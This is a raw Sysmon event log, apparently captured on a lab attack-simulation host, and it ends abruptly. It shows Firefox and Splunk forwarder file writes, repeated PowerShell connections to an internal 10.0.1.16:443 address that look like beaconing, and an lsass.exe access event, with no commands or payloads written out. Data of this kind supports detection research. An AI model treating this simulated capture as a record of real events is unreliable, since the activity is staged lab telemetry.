Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.603{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\ads-track-digest256.vlpsetMD5=8D9E3EEEE577DCE4B0062413A081F9F2,SHA256=D0E3356B67A0BB9BD101D87FA6E23EC2699CC8A25564CD88076663DACF73A9CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.603{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\ads-track-digest256.sbstoreMD5=2CC22CF356532158115AB8A0851A9A80,SHA256=6B106FD00C6E27909C9779448E5BDA5FFB96FE2A6FF42636A662AB411D9906DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.603{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=4321A54F130A50EF926BAB0BF11425B8,SHA256=8892302AE988A95D942A5F2748E61B84E789AAD85C4F20C34812FA9D4F1B8984,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.587{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.503{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=BCFBACD8DA1020F786A84F601333F186,SHA256=EC99F1637B79AC97206D315F8465481AE709D68AF69E7F4E9C7112D9545FAEEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.503{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-unwanted-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.488{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=AE68013D83424446E9B627F0301C2998,SHA256=CC71BF6E4D4CB02C50B68DAE0535F9C2E3C9A7F1B0F8D4EEACC6456C73315D70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.488{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-malware-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.471{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=CB9D856800CB9BA325DABEDD5CD7C1C0,SHA256=06025AE7D29A6E4A8C5D908EF8628CC8FD4D61D03EF13CD479BE9BA90B855212,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.432{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Local\Mozilla\Firefox\Profiles\ascrdua7.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.035{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C365A9EBEF68EC9F4EBF4963BC3E0238,SHA256=ABEB46491446F32F44A25C0C20EACE0C47C30CB68E379067CBFD96F560DDCBA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.332{B81B27B7-5BF5-611D-6D04-00000000C801}5004C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52449-false142.251.33.106sea30s10-in-f10.1e100.net443https 354300x800000000000000035342686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.296{B81B27B7-5BF5-611D-6D04-00000000C801}5004C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52448-false104.16.248.249-443https 23542300x800000000000000035342685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:39.266{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:39.168{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=229296A33274DA4DD0DB590C0277E085,SHA256=C959B58A1A0204086D96DED3F0F9DB55C18066EBACDE8ACE573E3619D32B96A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:06.066{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52450-false10.0.1.12-8000- 23542300x800000000000000035342689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:40.570{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F9F2729E51629620D706D6B8EC1C2241,SHA256=1CC9F1E91868A7D60C900C19BEA46271810E7D05D415F6116E395A67E8EF2CEF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:40.186{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90818ACCD1D7614F276593DAE38EC6B9,SHA256=74D5781DE57D1A8BC217B6207A222CFC52DB93324CFCA6845EF5CDB6539F2F77,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:06.419{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52451-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:41.217{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6B71BA6036C47F5F5B905583928C82B,SHA256=56981FDB74DA7434D5DE59F270035F05D0079E0100C4B6A862E67EB7B03593AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:42.266{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFB6473F82D0DCAAD1774F3DA023D756,SHA256=C7BCC409E1F5C2331D9213653F584478777DF813E4DFA7A574B0FD29049739BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:43.284{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B79250A8EF8312583C640AE573BA20FF,SHA256=6E8CE5991C0E8BD729930BE64F0BA946589BA1C694A28ECFDA6A0552F18154C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:43.247{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5A803CA90F42914409D812AD1A191081,SHA256=521CFDE806E7B101008C0F2E4F8044848FFEE197F721584995DAEB1190F7CF34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:43.247{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=4AAA32327C756B762EB65BC990D7E595,SHA256=8E72D447A1F72F1140B8D15F8731A9ECA7C0B5A74A110BB14E7B2CDAA58A36AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:44.888{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=ADF6F2E296267786BABD701BEB56140A,SHA256=8B6CDF377538C2AD826E56DE0D284A4F9FE5470C896D347DB5A17B335D265C36,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:44.363{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8E1A2876DBF7D5D8B6DBCA249CA401F,SHA256=C488DED2911362947C55F9DA28939B7C2527E88F7CEF8AF360CAD7C89F980DD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:11.455{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52453-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035342701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:11.200{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52452-false10.0.1.12-8000- 23542300x800000000000000035342700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:45.571{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=06E77D0124D8F5BBD357578686873DB2,SHA256=441FF52FBBBFF57D271592EF430A4385B9A7A43645AE865C20AF1A300692026B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:45.373{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=485F07208F1805CCA4EB44DE5BF2AB7B,SHA256=4B9CBB0DE93160842A6545C3069651875D3BC0E49A4D13BB73E3A22B30A3FB4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:46.388{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=773992CC48699F90C2F72864FF1A3E2F,SHA256=57E2674769F2D44451972C09A52F76CCC787967CEC011E4F600193441D964088,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:47.435{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A5AB00ECDFBF4E29F92B39E9C352DEB,SHA256=1FE7168204C6C0CC167EFD3FED59E3CD56BA49944F70B70A1E01D6069CDD6C45,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:48.449{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=892AB8E2736CBE01180752E20BD63D8E,SHA256=C108199316F40DFBB0A16B1FF6039A47A40200195CEB3AA12A5A1C36F75E9BA9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:49.468{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04FA6C9334CC5D006F71AD06623402E9,SHA256=6CE836D4E3561023D9350615579AFC10BEB41E1B750804FB5E134175ABED704B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:16.487{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52454-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:50.532{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F84F6F29E1BF3CF0506BFB8C394680E3,SHA256=D0B95E90EF44561C2830DA00D851C9AC8BE568A2BC5AC558812AB670B23F0457,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:50.485{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F52A6BD427F88EA285765E166688D18C,SHA256=847777A8E978B2262162FBB724821A91EB3EC8602F9FD61945BA66D69BE267A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:17.217{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52455-false10.0.1.12-8000- 23542300x800000000000000035342710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:51.500{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BD578C3CDB39A7C39848D5D871494B4,SHA256=283BDB5CB8BEEE2E87E13A5B40FFC2F4F0ED2C37AC30E1DBBAD820259375E291,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:52.545{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD6F617DB221CB5DF9779F9556FFDF7,SHA256=8582CDE7061731DD0734A71B4C939FF2F7E56A13F5A26EF4CF2AAD38C87E0E39,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:53.561{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=309037DFE51EC52302A51A3763DEBCD0,SHA256=441B6C33866941B27AED6596705BC09C11C153CCE0171CD627EC07631495E7B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:54.580{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99A84CA3FD3A64D355FB06973789A1FC,SHA256=7675FECD87600266F80588CA26548999C5B6AD7CAB3C209F87E556DE0B218416,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:55.580{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD82C3B758E20C9140B38747CBEE127C,SHA256=E62A8035486D90BBE0C5D65328029893CBB19BD8A448CE7FAAA192062FCD4019,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:56.717{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C9615940D414D0867DC7FFC1D043D5C0,SHA256=A5ED87AB9009CCDE62C9D0B014DB003480AE4CF4C3FBED8FED5F26AC2FD30BE4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:56.585{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEB306479525EFB77D83C33111EADE0D,SHA256=74DB9EBD47F843421337B6B45EDD566F584FD69B36190144F6A63EA6AF6767ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:57.615{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=319CED15C64162E11AEE42A94A9C58FF,SHA256=9B7C5AE6B37C17D03AA0B1645766E93FBA1C0BDE94898C45ECFA1FD05ADF2D4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:22.498{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52456-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035342721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:23.059{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52457-false10.0.1.12-8000- 23542300x800000000000000035342720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:58.630{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F68910D02234DD3B62ED44C87D4B5FD,SHA256=E95F4AE918FF3A4192BB77D27A80BC6919BCD230469EFAF34E092B9F45C65E87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:59.666{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDB9DBECA26DCBE169C441402A978D0F,SHA256=F7AD7376A2CA7ED205997CE46078785DBB28FA190869D1C23CC26E929715C274,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:59.514{B81B27B7-4012-611D-0B00-00000000C801}6361624C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\